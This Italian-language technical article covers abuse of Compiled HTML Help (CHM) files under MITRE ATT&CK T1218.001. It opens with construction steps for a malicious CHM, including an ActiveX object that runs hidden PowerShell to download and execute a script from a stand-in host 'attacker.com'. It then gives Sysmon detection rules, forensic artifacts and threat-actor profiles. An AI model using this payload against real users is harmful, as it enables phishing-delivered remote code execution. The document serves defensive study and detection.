File HTML Compilati: Compiled HTML File (T1218.001)

La creazione di un CHM malevolo richiede comprensione delle sue componenti interne. Il processo inizia con la preparazione dei file sorgente HTML che conterranno il payload.

Crea prima il file di progetto HHP con questa struttura base:

[OPTIONS]
Compatibility=1.1 or later
Compiled file=malicious.chm
Contents file=toc.hhc
Display compile progress=No
Language=0x409 English (United States)

[FILES]
index.html

Il cuore dell'attacco risiede nel file HTML che incorpora il codice malevolo. Una tecnica efficace sfrutta oggetti ActiveX per eseguire comandi:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe,/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>

La compilazione avviene tramite HTML Help Workshop o strumenti command-line equivalenti. Il file risultante apparirà come documentazione legittima ma eseguirà il payload al click dell'utente.

Per testare in laboratorio, monitora l'esecuzione con Process Monitor filtrando su hh.exe. Noterai la catena di processi che parte dal CHM fino all'esecuzione del payload PowerShell.

APT38 ha dimostrato l'efficacia di questa tecnica nascondendo interi framework di post-exploitation all'interno di CHM apparentemente innocui. La chiave sta nel bilanciare la complessità del payload con la necessità di mantenere un file di dimensioni credibili.

La detection di CHM malevoli richiede un approccio comportamentale che vada oltre la semplice analisi statica. Il punto focale è monitorare hh.exe e i suoi processi figli anomali.

Configura Sysmon per catturare eventi di process creation con questa regola: EventCode 1 where ParentImage contains "hh.exe" and (Image contains "powershell.exe" OR Image contains "cmd.exe" OR Image contains "mshta.exe")

L'analisi deve considerare il contesto di esecuzione. CHM lanciati da directory temporanee o scaricati da internet presentano rischio elevato. Directory come %TEMP%, %APPDATA%\Local\Temp o la cartella Downloads sono indicatori critici.

Un pattern distintivo è la rapida sequenza temporale tra apertura del CHM e spawn di processi sospetti. Silence ha utilizzato CHM che eseguivano payload entro 2 secondi dall'apertura, un comportamento raramente osservato in help file legittimi.

Per ridurre i falsi positivi, crea una baseline dei CHM utilizzati internamente. Software come Visual Studio o framework .NET includono documentazione CHM legittima che genera processi figli per aggiornamenti o navigazione avanzata.

L'approccio più efficace combina detection basata su path, processi figli e timing. Un CHM che spawna PowerShell con parametri di bypass (-nop -w hidden) da una directory non standard rappresenta un indicatore ad alta confidenza che merita investigazione immediata.

L'analisi forense di attacchi CHM richiede attenzione ai dettagli temporali e agli artefatti lasciati dal processo di esecuzione. Il file CHM stesso rappresenta solo l'inizio della catena di compromissione.

Windows registra l'esecuzione di hh.exe nel Prefetch, fornendo timestamp precisi e conteggio delle esecuzioni. Il file HH.EXE-[HASH].pf contiene riferimenti ai CHM aperti e può rivelare tentativi multipli di esecuzione.

La cache di Internet Explorer conserva tracce dell'estrazione temporanea dei contenuti CHM. Directory come %LOCALAPPDATA%\Microsoft\Windows\INetCache possono contenere frammenti HTML e script estratti durante l'esecuzione.

Dark Caracal ha dimostrato come i CHM lascino tracce nel registro di Windows. La chiave HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU registra i percorsi dei file aperti, inclusi i CHM scaricati.

L'analisi della timeline deve correlare l'apertura del CHM con eventi successivi. Cerca connessioni di rete anomale entro minuti dall'esecuzione, creazione di file in directory di staging, o modifiche alle chiavi di persistenza del registro.

Per ricostruire l'intera catena, esamina i Windows Event Logs cercando EventID 4688 (process creation) con hh.exe come processo padre. Questo fornisce visibilità sui comandi eseguiti e permette di tracciare la propagazione laterale del malware.

L'utilizzo di CHM come vettore d'attacco rivela caratteristiche distintive degli attori che lo impiegano. Ogni gruppo mostra pattern unici nell'implementazione e distribuzione di questa tecnica.

OilRig integra CHM in campagne di spear-phishing mirate al settore energetico mediorientale. I loro CHM contengono tipicamente dropper che scaricano tool post-exploitation personalizzati. La distribuzione avviene attraverso email che simulano documentazione tecnica di sistemi SCADA.

APT41 dimostra maggiore sofisticazione tecnica, utilizzando CHM con multiple tecniche di evasione. I loro file includono controlli anti-sandbox e verifiche di dominio prima dell'esecuzione del payload principale. Target primari sono aziende healthcare e telecommunications nell'area Asia-Pacifico.

Astaroth rappresenta un caso particolare dove CHM viene utilizzato come primo stadio in catene di infezione complesse. Il malware sfrutta oggetti ActiveX per manipolazione file avanzata, scaricando componenti aggiuntivi solo dopo verifiche ambientali extensive.

Il trend emergente mostra evoluzione verso CHM "fileless" che non scrivono payload su disco. APT38 ha pionerato questa tecnica caricando shellcode direttamente in memoria attraverso script embedded nel CHM.

L'intelligence suggerisce che gruppi con capacità di sviluppo avanzate stanno esplorando CHM come alternativa a macro Office, anticipando restrizioni Microsoft. Monitora repository di tool offensivi per nuovi framework CHM e correlali con campagne attive per identificazione precoce di nuove varianti.

Framework MITRE ATT&CK T1218.001 documenta l'abuso di Compiled HTML File per defense evasion. Riferimenti includono campagne di OilRig, Dark Caracal, APT38, Silence e APT41. Detection patterns basati su analisi comportamentale di hh.exe e processi figli anomali.